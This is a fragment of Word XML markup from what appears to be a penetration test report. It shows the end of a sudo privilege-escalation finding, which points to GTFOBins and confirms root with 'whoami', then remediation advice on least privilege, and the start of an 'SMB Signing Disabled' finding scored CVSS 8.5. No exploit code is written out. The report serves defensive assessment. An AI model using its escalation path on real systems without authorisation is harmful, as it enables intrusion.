          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="Rb96934186c2b4342">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="50416BFB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>GFTO</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="18207E15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>B</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="50416BFB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="50416BFB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="50416BFB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and drop the commands here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="50416BFB" w:rsidP="0D325B6E" w:rsidRDefault="50416BFB" w14:paraId="44B955C1" w14:textId="569470E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416BFB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Run </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="50416BFB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="50416BFB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="50416BFB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to view newly elevated privilege as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="44267765" w14:textId="6981BBE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01A641D" w:rsidP="0D325B6E" w:rsidRDefault="001A641D" w14:paraId="2B896339" w14:textId="0928B21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01A641D" w:rsidP="0D325B6E" w:rsidRDefault="001A641D" w14:paraId="052D7E4D" w14:textId="2F1919F2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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001A641D">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01A641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01A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>recommends</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0A606EA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0E9C4B7">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52320D16" w:rsidP="0D325B6E" w:rsidRDefault="52320D16" w14:paraId="1797435D" w14:textId="221C17FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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2320D16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BINARY</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 permissions be removed from the user if th</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488E4F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sudo</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permission is unnecessary. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="27B396AE" w:rsidP="0D325B6E" w:rsidRDefault="27B396AE" w14:paraId="1E0153EC" w14:textId="6052B8B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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27B396AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Never grant broad </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27B396AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27B396AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or wildcard command permissions, constrain allowed commands to a single absolute path and to only exact subcommands </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27B396AE">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27B396AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="27B396AE" w:rsidP="0D325B6E" w:rsidRDefault="27B396AE" w14:paraId="16DDE0AD" w14:textId="1272E6E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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27B396AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Require authentication and remove </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27B396AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NOPASSWD</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27B396AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so actions are accountable and require user credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52320D16" w:rsidP="0D325B6E" w:rsidRDefault="52320D16" w14:paraId="2540B971" w14:textId="22F502EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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ATP should implement </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0A83AF37">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the Principle of Leas</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0A83AF37">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0A83AF3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6ECD073">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to ensure that each user does not have more permissions than </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0CCA8AC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>absolutely</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52320D16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> necess</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6F890154">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ary</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0A89890C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for business operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="01310CA4" w14:textId="7B202916">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01A641D" w:rsidP="0D325B6E" w:rsidRDefault="001A641D" w14:paraId="7C803B48" w14:textId="5FD0B78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1A641D">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EE8253A" w:rsidP="0D325B6E" w:rsidRDefault="2EE8253A" w14:paraId="27DD3865" w14:textId="0D8B6727">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R57764d22eb7f46ff">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="2EE8253A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Red Hat - Managing Sudo Access</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="245C54EA" w:rsidP="0D325B6E" w:rsidRDefault="245C54EA" w14:paraId="330257F2" w14:textId="5936E3EE">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R0746149185554d4e">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="245C54EA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>CrowdStrike - Principle of Least Privilege</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="245C54EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4567C3F3" w14:textId="1E442079">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="386853A0" w:rsidP="0D325B6E" w:rsidRDefault="386853A0" w14:paraId="79F47BE0" w14:textId="1E3CB2F4">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436737910" w:id="550020063"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="386853A0">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="386853A0">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1687920193" w:id="2147240160"/>
      <w:bookmarkStart w:name="_Toc1632419916" w:id="1615891325"/>
      <w:bookmarkStart w:name="_Toc1866576212" w:id="670084256"/>
      <w:bookmarkStart w:name="_Toc1025220919" w:id="161440191"/>
      <w:bookmarkStart w:name="_Toc1564720507" w:id="1442507853"/>
      <w:bookmarkStart w:name="_Toc1629521800" w:id="176843575"/>
      <w:bookmarkStart w:name="_Toc1034862823" w:id="2130340987"/>
      <w:bookmarkStart w:name="_Toc497825445" w:id="1146049975"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1FCE8D2C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB Signing Disabled</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176843575"/>
      <w:bookmarkEnd w:id="2130340987"/>
      <w:bookmarkEnd w:id="1146049975"/>
      <w:bookmarkEnd w:id="2147240160"/>
      <w:bookmarkEnd w:id="1615891325"/>
      <w:bookmarkEnd w:id="670084256"/>
      <w:bookmarkEnd w:id="161440191"/>
      <w:bookmarkEnd w:id="1442507853"/>
      <w:bookmarkEnd w:id="55002006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56B2788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2FFA1F" w14:textId="72E33B9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EC235F" w14:textId="58E7BB1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CC1707" w14:textId="1B6AC71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173059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D045E9" w14:textId="15449F5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33CC2E3" w14:textId="5F4429BB">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32F90484" w:rsidP="0D325B6E" w:rsidRDefault="32F90484" w14:paraId="427876D6" w14:textId="36DCA0CC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="32F90484">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>8.5</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4CD4B28" w:rsidP="0D325B6E" w:rsidRDefault="74CD4B28" w14:paraId="231270AF" w14:textId="0244D784">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="74CD4B28">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6E996CC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C97A6C5" w14:textId="2EA961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84B95C4" w:rsidP="0D325B6E" w:rsidRDefault="784B95C4" w14:paraId="0DB58A18" w14:textId="01B7B738">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="784B95C4">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3ED4963"/>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CE1709B"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="19F240F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965E54" w14:textId="6CE7243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32E7A6D" w:rsidP="0D325B6E" w:rsidRDefault="132E7A6D" w14:paraId="25E11A2F" w14:textId="52521FE0">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" r:id="Rc58397aaba374ff7">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="132E7A6D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7D5EF3DC">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>A/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7930D6B2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>/VA:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="132E7A6D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="132E7A6D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
